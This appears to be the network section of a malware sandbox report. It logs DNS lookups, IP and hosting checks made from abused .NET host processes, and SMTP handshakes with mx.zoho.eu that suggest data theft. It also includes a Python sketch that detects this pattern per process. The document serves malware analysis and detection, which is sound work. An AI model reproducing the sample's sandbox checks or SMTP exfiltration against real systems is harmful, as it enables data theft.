May 8, 2024 09:21:27.198493004 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.198580980 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.198800087 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.198852062 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.198884010 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.198903084 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.199028015 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.284934998 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.285952091 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.285965919 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.286050081 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.291414022 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.521024942 CEST  587          49758      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.521045923 CEST  587          49758      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.521058083 CEST  587          49758      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.521070957 CEST  587          49758      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.559114933 CEST  587          49758      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.584311962 CEST  587          49758      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.612814903 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.618340969 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.711565018 CEST  49758        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.940932989 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.940956116 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.940968990 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:27.941153049 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:27.944845915 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:28.266350031 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:28.379668951 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:28.701086044 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:28.701111078 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:28.701123953 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:28.701164007 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:28.701503038 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:29.022916079 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:29.023252010 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:29.379421949 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:29.379697084 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:29.701169968 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:29.701406002 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:30.022962093 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:30.023268938 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:30.347563982 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:30.348110914 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:30.348172903 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:30.348212004 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:30.348232985 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:30.669358969 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:30.669385910 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:30.739433050 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:30.777919054 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:31.099468946 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:31.099616051 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:31.099652052 CEST  587          49762      185.230.214.164  192.168.2.4
May 8, 2024 09:21:31.099703074 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:31.099899054 CEST  49762        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:31.100924969 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:31.426116943 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:31.426204920 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:31.749907970 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:31.751312971 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:32.073342085 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:32.073451996 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:32.073466063 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:32.073492050 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:32.073523045 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:32.073697090 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:32.397638083 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:32.398113966 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:32.720558882 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:32.721611023 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:32.721611977 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:33.043629885 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:33.043927908 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:33.043941021 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:33.043952942 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:33.044178009 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:33.044249058 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:33.366872072 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:33.367136002 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:33.725059986 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:33.725277901 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.048331976 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:34.048533916 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.370830059 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:34.371043921 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.694858074 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:34.695363045 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695452929 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695452929 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695631027 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695631027 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695656061 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695656061 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695739985 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:34.695739985 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:21:35.017810106 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:35.017833948 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:35.017942905 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:35.018095970 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:35.086400032 CEST  587          49765      185.230.214.164  192.168.2.4
May 8, 2024 09:21:35.141108036 CEST  49765        587        192.168.2.4      185.230.214.164
May 8, 2024 09:22:07.187556028 CEST  49723        80         192.168.2.4      199.232.210.172
May 8, 2024 09:22:07.187706947 CEST  49724        80         192.168.2.4      199.232.210.172
May 8, 2024 09:22:07.350658894 CEST  80           49724      199.232.210.172  192.168.2.4
May 8, 2024 09:22:07.350681067 CEST  80           49724      199.232.210.172  192.168.2.4
May 8, 2024 09:22:07.350819111 CEST  49724        80         192.168.2.4      199.232.210.172
May 8, 2024 09:22:07.350837946 CEST  80           49723      199.232.210.172  192.168.2.4
                                                                        May 8, 2024 09:22:07.350873947 CEST8049723199.232.210.172192.168.2.4
                                                                        May 8, 2024 09:22:07.350959063 CEST4972380192.168.2.4199.232.210.172
                                                                        May 8, 2024 09:22:52.644767046 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:52.966161966 CEST58749752185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:52.966275930 CEST58749752185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:52.966306925 CEST58749752185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:52.966312885 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:52.966341972 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:52.966945887 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.508986950 CEST49748587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.828392982 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828555107 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828736067 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828772068 CEST49748587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.828774929 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828813076 CEST49748587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.829564095 CEST49748587192.168.2.4185.230.214.164
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 8, 2024 09:21:03.063713074 CEST | 50699 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 09:21:03.227633953 CEST | 53 | 50699 | 1.1.1.1 | 192.168.2.4
May 8, 2024 09:21:04.877274036 CEST | 56245 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 09:21:05.044781923 CEST | 53 | 56245 | 1.1.1.1 | 192.168.2.4
May 8, 2024 09:21:11.017276049 CEST | 54293 | 53 | 192.168.2.4 | 1.1.1.1
May 8, 2024 09:21:11.185365915 CEST | 53 | 54293 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 8, 2024 09:21:03.063713074 CEST | 192.168.2.4 | 1.1.1.1 | 0x517e | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:04.877274036 CEST | 192.168.2.4 | 1.1.1.1 | 0xf317 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:11.017276049 CEST | 192.168.2.4 | 1.1.1.1 | 0x8ab4 | Standard query (0) | smtp.zoho.eu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 8, 2024 09:21:03.227633953 CEST | 1.1.1.1 | 192.168.2.4 | 0x517e | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:03.227633953 CEST | 1.1.1.1 | 192.168.2.4 | 0x517e | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:03.227633953 CEST | 1.1.1.1 | 192.168.2.4 | 0x517e | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:05.044781923 CEST | 1.1.1.1 | 192.168.2.4 | 0xf317 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:10.570144892 CEST | 1.1.1.1 | 192.168.2.4 | 0xac1c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:10.570144892 CEST | 1.1.1.1 | 192.168.2.4 | 0xac1c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:11.095401049 CEST | 1.1.1.1 | 192.168.2.4 | 0x237e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
May 8, 2024 09:21:11.095401049 CEST | 1.1.1.1 | 192.168.2.4 | 0x237e | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.211.108 | A (IP address) | IN (0x0001) | false
May 8, 2024 09:21:11.185365915 CEST | 1.1.1.1 | 192.168.2.4 | 0x8ab4 | No error (0) | smtp.zoho.eu | | 185.230.214.164 | A (IP address) | IN (0x0001) | false
                                                                        • api.ipify.org
                                                                        • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 208.95.112.1 | 80 | 8084 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 09:21:05.256422043 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
May 8, 2024 09:21:05.419017076 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:04 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 208.95.112.1 | 80 | 7752 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 09:21:09.701174974 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
May 8, 2024 09:21:09.864020109 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:09 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 55
    X-Rl: 43
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49746 | 208.95.112.1 | 80 | 7660 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 09:21:15.865681887 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
May 8, 2024 09:21:16.029175043 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:15 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 49
    X-Rl: 42
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49760 | 208.95.112.1 | 80 | 8676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 09:21:25.154541969 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
May 8, 2024 09:21:25.317081928 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:24 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 40
    X-Rl: 41
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.26.13.205 | 443 | 8084 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-08 07:21:04 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-05-08 07:21:04 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:04 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8807b0dbccee76f8-SEA
2024-05-08 07:21:04 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
    Data Ascii: 81.181.60.92


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 104.26.13.205 | 443 | 7752 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-08 07:21:09 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-05-08 07:21:09 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:09 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8807b0f9bf36c4c0-SEA
2024-05-08 07:21:09 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
    Data Ascii: 81.181.60.92


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49745 | 104.26.13.205 | 443 | 7660 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-08 07:21:15 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-05-08 07:21:15 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:15 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8807b1203d7e936f-SEA
2024-05-08 07:21:15 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
    Data Ascii: 81.181.60.92


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49759 | 104.26.13.205 | 443 | 8676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-08 07:21:23 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-05-08 07:21:23 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 May 2024 07:21:23 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8807b1539afc8389-SEA
2024-05-08 07:21:23 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
    Data Ascii: 81.181.60.92
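The eight HTTP sessions above are the sample's environment check, repeated by each .NET Framework host process (InstallUtil.exe, MSBuild.exe, AddInProcess32.exe, jsc.exe): a GET to ip-api.com with `fields=hosting`, which answers `true` for the sandbox's egress address, and a GET to api.ipify.org that returns that address (81.181.60.92). Both lookups are harmless from a browser, so the detection signal is the host image making them, and a following SMTP connection from the same process. The Python below is an added example, not code from the report or from Joe Sandbox, showing how a sensor would reduce such events to a verdict per PID. The event records are constructed from the session tables on this page; the MSBuild.exe connection to 185.230.214.164:587 is assumed for the example (the SMTP table below carries no PID), and RegAsm/RegSvcs in the host list and the chrome.exe control event are assumptions too.

```python
"""Reduce process-attributed network events to a verdict per PID.
Added example; the events at the bottom are constructed from this page."""
from dataclasses import dataclass
from typing import Optional

# .NET Framework binaries commonly used as process-hollowing hosts. The four
# seen on this page are observed; RegAsm/RegSvcs are assumed, not seen here.
DOTNET_HOSTS = {"installutil.exe", "msbuild.exe", "addinprocess32.exe", "jsc.exe",
                "regasm.exe", "regsvcs.exe"}
IP_CHECK_HOSTS = {"api.ipify.org", "ip-api.com"}
SMTP_PORTS = {25, 465, 587}


@dataclass
class NetEvent:
    pid: int
    image: str                   # full path of the process that owns the socket
    dst_ip: str
    dst_port: int
    host: Optional[str] = None   # HTTP Host header (None for non-HTTP traffic)
    uri: Optional[str] = None    # HTTP request target
    body: Optional[str] = None   # decoded response body, if the sensor has it


def image_name(path):
    """Basename of a Windows or POSIX path, lower-cased for matching."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Tags that apply to a single network event."""
    tags = set()
    if ev.host in IP_CHECK_HOSTS:
        tags.add("ip-service-lookup")
    if ev.host == "ip-api.com" and ev.uri and "fields=hosting" in ev.uri:
        tags.add("hosting-check")
        if ev.body is not None and ev.body.strip() == "true":
            tags.add("hosting-check:true")   # the service told the sample it is hosted
    if ev.dst_port in SMTP_PORTS:
        tags.add("smtp-port")
    # the lookups are benign from a browser; the host process carries the signal
    if tags and image_name(ev.image) in DOTNET_HOSTS:
        tags.add("dotnet-host-process")
    return tags


def correlate(events):
    """Union the tags of all events per PID and reduce them to a verdict."""
    per_pid = {}
    for ev in events:
        per_pid.setdefault(ev.pid, set()).update(classify(ev))
    verdicts = {}
    for pid, tags in per_pid.items():
        if {"dotnet-host-process", "hosting-check", "smtp-port"} <= tags:
            verdicts[pid] = "exfil-pattern"
        elif {"dotnet-host-process", "ip-service-lookup"} <= tags:
            verdicts[pid] = "recon-from-dotnet-host"
        else:
            verdicts[pid] = "none"
    return verdicts


FW = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
HOSTING_URI = "/line/?fields=hosting"
# Constructed from the sessions above. The MSBuild SMTP event (no PID is given
# for SMTP on this page) and the chrome.exe benign control are assumptions.
SAMPLE_EVENTS = [
    NetEvent(8084, FW + r"\InstallUtil.exe", "208.95.112.1", 80, "ip-api.com", HOSTING_URI, "true\n"),
    NetEvent(8084, FW + r"\InstallUtil.exe", "104.26.13.205", 443, "api.ipify.org", "/", "81.181.60.92"),
    NetEvent(7752, FW + r"\MSBuild.exe", "208.95.112.1", 80, "ip-api.com", HOSTING_URI, "true\n"),
    NetEvent(7752, FW + r"\MSBuild.exe", "104.26.13.205", 443, "api.ipify.org", "/", "81.181.60.92"),
    NetEvent(7752, FW + r"\MSBuild.exe", "185.230.214.164", 587),
    NetEvent(1234, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
             "104.26.13.205", 443, "api.ipify.org", "/", "203.0.113.7"),
]

if __name__ == "__main__":
    for pid, verdict in sorted(correlate(SAMPLE_EVENTS).items()):
        print(pid, verdict)
```

The `true` reply is worth keeping as its own tag: it records that the hosting check did not stop this sample, since the SMTP sessions in the table below begin a few seconds after the first ip-api.com answer.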


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 8, 2024 09:21:11.920242071 CEST | 587 | 49739 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:11 AM CEST
May 8, 2024 09:21:11.920680046 CEST | 49739 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:12.468164921 CEST | 587 | 49739 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:12.468178988 CEST | 587 | 49739 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
    250 SIZE 53477376
May 8, 2024 09:21:12.468358040 CEST | 49739 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:12.793222904 CEST | 587 | 49739 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.
May 8, 2024 09:21:12.884509087 CEST | 587 | 49742 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:12 AM CEST
May 8, 2024 09:21:12.885888100 CEST | 49742 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:13.207757950 CEST | 587 | 49742 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:13.207770109 CEST | 587 | 49742 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
May 8, 2024 09:21:13.207781076 CEST | 587 | 49742 | 185.230.214.164 | 192.168.2.4 | 250 SIZE 53477376
May 8, 2024 09:21:13.207923889 CEST | 49742 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:13.527707100 CEST | 587 | 49742 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.
May 8, 2024 09:21:17.443345070 CEST | 587 | 49748 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:17 AM CEST
May 8, 2024 09:21:17.443475008 CEST | 49748 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:17.621773958 CEST | 587 | 49749 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:17 AM CEST
May 8, 2024 09:21:17.621994972 CEST | 49749 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:17.764997005 CEST | 587 | 49748 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:17.765010118 CEST | 587 | 49748 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
May 8, 2024 09:21:17.765037060 CEST | 587 | 49748 | 185.230.214.164 | 192.168.2.4 | 250 SIZE 53477376
May 8, 2024 09:21:17.765208006 CEST | 49748 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:17.943842888 CEST | 587 | 49749 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:17.943862915 CEST | 587 | 49749 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
    250 SIZE 53477376
May 8, 2024 09:21:17.944067001 CEST | 49749 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:18.084834099 CEST | 587 | 49748 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.
May 8, 2024 09:21:18.267272949 CEST | 587 | 49749 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.
May 8, 2024 09:21:18.668009043 CEST | 587 | 49752 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:18 AM CEST
May 8, 2024 09:21:18.668190956 CEST | 49752 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:18.989480019 CEST | 587 | 49752 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:18.989521027 CEST | 587 | 49752 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
May 8, 2024 09:21:18.989532948 CEST | 587 | 49752 | 185.230.214.164 | 192.168.2.4 | 250 SIZE 53477376
May 8, 2024 09:21:18.989733934 CEST | 49752 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:19.311316967 CEST | 587 | 49752 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.
May 8, 2024 09:21:22.878096104 CEST | 587 | 49758 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:22 AM CEST
May 8, 2024 09:21:22.889703989 CEST | 49758 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:23.209759951 CEST | 587 | 49758 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:23.209810019 CEST | 587 | 49758 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
May 8, 2024 09:21:23.209825993 CEST | 587 | 49758 | 185.230.214.164 | 192.168.2.4 | 250 SIZE 53477376
